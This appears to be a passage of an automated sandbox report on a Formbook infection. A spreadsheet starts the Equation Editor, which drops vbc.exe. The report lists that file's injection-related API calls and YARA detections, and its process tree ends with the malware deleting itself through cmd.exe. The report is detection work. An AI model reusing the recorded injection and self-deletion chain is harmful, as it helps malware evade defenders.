Source: C:\Users\Public\vbc.exe Code function: 7_2_008BFC90 NtUnmapViewOfSection,LdrInitializeThunk, 7_2_008BFC90
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BFC60 NtMapViewOfSection,LdrInitializeThunk, 7_2_008BFC60
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BFD8C NtDelayExecution,LdrInitializeThunk, 7_2_008BFD8C
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BFDC0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_008BFDC0
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BFEA0 NtReadVirtualMemory,LdrInitializeThunk, 7_2_008BFEA0
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_008BFED0
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BFFB4 NtCreateSection,LdrInitializeThunk, 7_2_008BFFB4
Source: C:\Users\Public\vbc.exe Code function: 7_2_008C10D0 NtOpenProcessToken, 7_2_008C10D0
Source: C:\Users\Public\vbc.exe Code function: 7_2_008C0060 NtQuerySection, 7_2_008C0060
Source: C:\Users\Public\vbc.exe Code function: 7_2_008C01D4 NtSetValueKey, 7_2_008C01D4
Source: C:\Users\Public\vbc.exe Code function: 7_2_008C010C NtOpenDirectoryObject, 7_2_008C010C
Source: C:\Users\Public\vbc.exe Code function: 7_2_008C1148 NtOpenThread, 7_2_008C1148
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BF8CC NtWaitForSingleObject, 7_2_008BF8CC
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BF938 NtWriteFile, 7_2_008BF938
Source: C:\Users\Public\vbc.exe Code function: 7_2_008C1930 NtSetContextThread, 7_2_008C1930
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BFAB8 NtQueryValueKey, 7_2_008BFAB8
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BFA20 NtQueryInformationFile, 7_2_008BFA20
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BFA50 NtEnumerateValueKey, 7_2_008BFA50
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BFBE8 NtQueryVirtualMemory, 7_2_008BFBE8
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BFB50 NtCreateKey, 7_2_008BFB50
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BFC30 NtOpenProcess, 7_2_008BFC30
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BFC48 NtSetInformationFile, 7_2_008BFC48
Source: C:\Users\Public\vbc.exe Code function: 7_2_008C0C40 NtGetContextThread, 7_2_008C0C40
Source: C:\Users\Public\vbc.exe Code function: 7_2_008C1D80 NtSuspendThread, 7_2_008C1D80
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BFD5C NtEnumerateKey, 7_2_008BFD5C
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BFE24 NtWriteVirtualMemory, 7_2_008BFE24
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BFFFC NtCreateProcessEx, 7_2_008BFFFC
Source: C:\Users\Public\vbc.exe Code function: 7_2_008BFF34 NtQueueApcThread, 7_2_008BFF34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_020400C4 NtCreateFile,LdrInitializeThunk, 9_2_020400C4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_020407AC NtCreateMutant,LdrInitializeThunk, 9_2_020407AC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203FAE8 NtQueryInformationProcess,LdrInitializeThunk, 9_2_0203FAE8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203FB50 NtCreateKey,LdrInitializeThunk, 9_2_0203FB50
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203FB68 NtFreeVirtualMemory,LdrInitializeThunk, 9_2_0203FB68
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203FBB8 NtQueryInformationToken,LdrInitializeThunk, 9_2_0203FBB8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203F900 NtReadFile,LdrInitializeThunk, 9_2_0203F900
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203F9F0 NtClose,LdrInitializeThunk, 9_2_0203F9F0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 9_2_0203FED0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203FFB4 NtCreateSection,LdrInitializeThunk, 9_2_0203FFB4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203FC60 NtMapViewOfSection,LdrInitializeThunk, 9_2_0203FC60
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203FD8C NtDelayExecution,LdrInitializeThunk, 9_2_0203FD8C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203FDC0 NtQuerySystemInformation,LdrInitializeThunk, 9_2_0203FDC0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02040048 NtProtectVirtualMemory, 9_2_02040048
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02040060 NtQuerySection, 9_2_02040060
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02040078 NtResumeThread, 9_2_02040078
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_020410D0 NtOpenProcessToken, 9_2_020410D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0204010C NtOpenDirectoryObject, 9_2_0204010C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02041148 NtOpenThread, 9_2_02041148
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_020401D4 NtSetValueKey, 9_2_020401D4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203FA20 NtQueryInformationFile, 9_2_0203FA20
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203FA50 NtEnumerateValueKey, 9_2_0203FA50
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203FAB8 NtQueryValueKey, 9_2_0203FAB8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203FAD0 NtAllocateVirtualMemory, 9_2_0203FAD0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203FBE8 NtQueryVirtualMemory, 9_2_0203FBE8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203F8CC NtWaitForSingleObject, 9_2_0203F8CC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02041930 NtSetContextThread, 9_2_02041930
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203F938 NtWriteFile, 9_2_0203F938
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203FE24 NtWriteVirtualMemory, 9_2_0203FE24
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203FEA0 NtReadVirtualMemory, 9_2_0203FEA0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203FF34 NtQueueApcThread, 9_2_0203FF34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203FFFC NtCreateProcessEx, 9_2_0203FFFC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203FC30 NtOpenProcess, 9_2_0203FC30
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02040C40 NtGetContextThread, 9_2_02040C40
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203FC48 NtSetInformationFile, 9_2_0203FC48
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203FC90 NtUnmapViewOfSection, 9_2_0203FC90
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0203FD5C NtEnumerateKey, 9_2_0203FD5C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02041D80 NtSuspendThread, 9_2_02041D80
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_002081B0 NtCreateFile, 9_2_002081B0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_00208260 NtReadFile, 9_2_00208260
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_002082E0 NtClose, 9_2_002082E0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_002082AC NtReadFile, 9_2_002082AC
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 6_2_0137B673 6_2_0137B673
Source: C:\Users\Public\vbc.exe Code function: 6_2_004082E2 6_2_004082E2
Source: C:\Users\Public\vbc.exe Code function: 6_2_00405865 6_2_00405865
Source: C:\Users\Public\vbc.exe Code function: 6_2_00403490 6_2_00403490
Source: C:\Users\Public\vbc.exe Code function: 6_2_004058A8 6_2_004058A8
Source: C:\Users\Public\vbc.exe Code function: 6_2_00401151 6_2_00401151
Source: C:\Users\Public\vbc.exe Code function: 6_2_00401502 6_2_00401502
Source: C:\Users\Public\vbc.exe Code function: 6_2_00401508 6_2_00401508
Source: C:\Users\Public\vbc.exe Code function: 6_2_00401990 6_2_00401990
Source: C:\Users\Public\vbc.exe Code function: 6_2_004019A0 6_2_004019A0
Source: C:\Users\Public\vbc.exe Code function: 6_2_00405260 6_2_00405260
Source: C:\Users\Public\vbc.exe Code function: 6_2_00405270 6_2_00405270
Source: C:\Users\Public\vbc.exe Code function: 6_2_00403E20 6_2_00403E20
Source: C:\Users\Public\vbc.exe Code function: 6_2_004042D7 6_2_004042D7
Source: C:\Users\Public\vbc.exe Code function: 6_2_00407F00 6_2_00407F00
Source: C:\Users\Public\vbc.exe Code function: 6_2_0040170C 6_2_0040170C
Source: C:\Users\Public\vbc.exe Code function: 6_2_00401710 6_2_00401710
Source: C:\Users\Public\vbc.exe Code function: 6_2_00400322 6_2_00400322
Source: C:\Users\Public\vbc.exe Code function: 6_2_00400330 6_2_00400330
Source: C:\Users\Public\vbc.exe Code function: 6_2_00405FFF 6_2_00405FFF
Source: C:\Users\Public\vbc.exe Code function: 6_2_00401BA8 6_2_00401BA8
Source: C:\Users\Public\vbc.exe Code function: 6_2_00401BB8 6_2_00401BB8
Source: C:\Users\Public\vbc.exe Code function: 6_2_04F0E420 6_2_04F0E420
Source: C:\Users\Public\vbc.exe Code function: 6_2_04F0C641 6_2_04F0C641
Source: C:\Users\Public\vbc.exe Code function: 6_2_04EF0048 6_2_04EF0048
Source: C:\Users\Public\vbc.exe Code function: 6_2_04F0D210 6_2_04F0D210
Source: C:\Users\Public\vbc.exe Code function: 6_2_04F0DD58 6_2_04F0DD58
Source: C:\Users\Public\vbc.exe Code function: 6_2_04F0DA72 6_2_04F0DA72
Source: C:\Users\Public\vbc.exe Code function: 6_2_04EF0006 6_2_04EF0006
Source: C:\Users\Public\vbc.exe Code function: 6_2_04F0D1F6 6_2_04F0D1F6
Source: C:\Users\Public\vbc.exe Code function: 6_2_0137B6C0 6_2_0137B6C0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00401030 7_2_00401030
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041B8B1 7_2_0041B8B1
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041B963 7_2_0041B963
Source: C:\Users\Public\vbc.exe Code function: 7_2_00408C4B 7_2_00408C4B
Source: C:\Users\Public\vbc.exe Code function: 7_2_00408C50 7_2_00408C50
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041B493 7_2_0041B493
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041B496 7_2_0041B496
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041C539 7_2_0041C539
Source: C:\Users\Public\vbc.exe Code function: 7_2_00402D89 7_2_00402D89
Source: C:\Users\Public\vbc.exe Code function: 7_2_00402D90 7_2_00402D90
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041CE85 7_2_0041CE85
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041BF12 7_2_0041BF12
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041C795 7_2_0041C795
Source: C:\Users\Public\vbc.exe Code function: 7_2_00402FB0 7_2_00402FB0
Source: C:\Users\Public\vbc.exe Code function: 7_2_0137B673 7_2_0137B673
Source: C:\Users\Public\vbc.exe Code function: 7_2_008CE0C6 7_2_008CE0C6
Source: C:\Users\Public\vbc.exe Code function: 7_2_008FD005 7_2_008FD005
Source: C:\Users\Public\vbc.exe Code function: 7_2_008D3040 7_2_008D3040
Source: C:\Users\Public\vbc.exe Code function: 7_2_008E905A 7_2_008E905A
Source: C:\Users\Public\vbc.exe Code function: 7_2_008CE2E9 7_2_008CE2E9
Source: C:\Users\Public\vbc.exe Code function: 7_2_00971238 7_2_00971238
Source: C:\Users\Public\vbc.exe Code function: 7_2_008CF3CF 7_2_008CF3CF
Source: C:\Users\Public\vbc.exe Code function: 7_2_008F63DB 7_2_008F63DB
Source: C:\Users\Public\vbc.exe Code function: 7_2_008D2305 7_2_008D2305
Source: C:\Users\Public\vbc.exe Code function: 7_2_008D7353 7_2_008D7353
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091A37B 7_2_0091A37B
Source: C:\Users\Public\vbc.exe Code function: 7_2_008E1489 7_2_008E1489
Source: C:\Users\Public\vbc.exe Code function: 7_2_00905485 7_2_00905485
Source: C:\Users\Public\vbc.exe Code function: 7_2_008EC5F0 7_2_008EC5F0
Source: C:\Users\Public\vbc.exe Code function: 7_2_008D351F 7_2_008D351F
Source: C:\Users\Public\vbc.exe Code function: 7_2_008D4680 7_2_008D4680
Source: C:\Users\Public\vbc.exe Code function: 7_2_008DE6C1 7_2_008DE6C1
Source: C:\Users\Public\vbc.exe Code function: 7_2_00972622 7_2_00972622
Source: C:\Users\Public\vbc.exe Code function: 7_2_0095579A 7_2_0095579A
Source: C:\Users\Public\vbc.exe Code function: 7_2_008DC7BC 7_2_008DC7BC
Source: C:\Users\Public\vbc.exe Code function: 7_2_0096F8EE 7_2_0096F8EE
Source: C:\Users\Public\vbc.exe Code function: 7_2_008DC85C 7_2_008DC85C
Source: C:\Users\Public\vbc.exe Code function: 7_2_008F286D 7_2_008F286D
Source: C:\Users\Public\vbc.exe Code function: 7_2_0097098E 7_2_0097098E
Source: C:\Users\Public\vbc.exe Code function: 7_2_008D29B2 7_2_008D29B2
Source: C:\Users\Public\vbc.exe Code function: 7_2_008E69FE 7_2_008E69FE
Source: C:\Users\Public\vbc.exe Code function: 7_2_00955955 7_2_00955955
Source: C:\Users\Public\vbc.exe Code function: 7_2_00983A83 7_2_00983A83
Source: C:\Users\Public\vbc.exe Code function: 7_2_0097CBA4 7_2_0097CBA4
Source: C:\Users\Public\vbc.exe Code function: 7_2_0095DBDA 7_2_0095DBDA
Source: C:\Users\Public\vbc.exe Code function: 7_2_008CFBD7 7_2_008CFBD7
Source: C:\Users\Public\vbc.exe Code function: 7_2_008F7B00 7_2_008F7B00
Source: C:\Users\Public\vbc.exe Code function: 7_2_0096FDDD 7_2_0096FDDD
Source: C:\Users\Public\vbc.exe Code function: 7_2_00900D3B 7_2_00900D3B
Source: C:\Users\Public\vbc.exe Code function: 7_2_008DCD5B 7_2_008DCD5B
Source: C:\Users\Public\vbc.exe Code function: 7_2_00902E2F 7_2_00902E2F
Source: C:\Users\Public\vbc.exe Code function: 7_2_008EEE4C 7_2_008EEE4C
Source: C:\Users\Public\vbc.exe Code function: 7_2_008E0F3F 7_2_008E0F3F
Source: C:\Users\Public\vbc.exe Code function: 7_2_008FDF7C 7_2_008FDF7C
Source: C:\Users\Public\vbc.exe Code function: 7_2_0137B6C0 7_2_0137B6C0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_020F1238 9_2_020F1238
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0204E2E9 9_2_0204E2E9
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02052305 9_2_02052305
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02057353 9_2_02057353
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0209A37B 9_2_0209A37B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0204F3CF 9_2_0204F3CF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_020763DB 9_2_020763DB
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0207D005 9_2_0207D005
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02053040 9_2_02053040
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0206905A 9_2_0206905A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0204E0C6 9_2_0204E0C6
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_020F2622 9_2_020F2622
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02054680 9_2_02054680
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0205E6C1 9_2_0205E6C1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_020D579A 9_2_020D579A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0205C7BC 9_2_0205C7BC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_020857C3 9_2_020857C3
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02085485 9_2_02085485
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02061489 9_2_02061489
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0205351F 9_2_0205351F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0206C5F0 9_2_0206C5F0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02103A83 9_2_02103A83
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02077B00 9_2_02077B00
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_020FCBA4 9_2_020FCBA4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0204FBD7 9_2_0204FBD7
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_020DDBDA 9_2_020DDBDA
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0205C85C 9_2_0205C85C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0207286D 9_2_0207286D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_020EF8EE 9_2_020EF8EE
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_020D5955 9_2_020D5955
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_020F098E 9_2_020F098E
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_020529B2 9_2_020529B2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_020669FE 9_2_020669FE
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02082E2F 9_2_02082E2F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0206EE4C 9_2_0206EE4C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02060F3F 9_2_02060F3F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0207DF7C 9_2_0207DF7C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02080D3B 9_2_02080D3B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0205CD5B 9_2_0205CD5B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_020EFDDD 9_2_020EFDDD
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0020B493 9_2_0020B493
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0020B496 9_2_0020B496
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0020C539 9_2_0020C539
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0020C795 9_2_0020C795
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0020B8B1 9_2_0020B8B1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0020B954 9_2_0020B954
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_001F8C50 9_2_001F8C50
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_001F8C4B 9_2_001F8C4B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_001F2D90 9_2_001F2D90
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_001F2D89 9_2_001F2D89
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0020CE85 9_2_0020CE85
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0020BF12 9_2_0020BF12
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_001F2FB0 9_2_001F2FB0
Found potential string decryption / allocating functions
Source: C:\Users\Public\vbc.exe Code function: String function: 008CE2A8 appears 38 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0093F970 appears 81 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00913F92 appears 106 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0091373B appears 238 times
Source: C:\Users\Public\vbc.exe Code function: String function: 008CDF5C appears 105 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 0204DF5C appears 107 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 02093F92 appears 108 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 0209373B appears 238 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 020BF970 appears 81 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 0204E2A8 appears 38 times
PE file contains strange resources
Source: dun[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Yara signature match
Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2362795032.0000000000600000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2362795032.0000000000600000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2198454714.0000000000220000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2198454714.0000000000220000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2197884630.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2197884630.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2362716429.00000000002C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2362716429.00000000002C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2161637497.00000000038C9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2161637497.00000000038C9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@9/19@6/6
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$oustanding 03082921.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE629.tmp Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: oustanding 03082921.xlsx ReversingLabs: Detection: 26%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
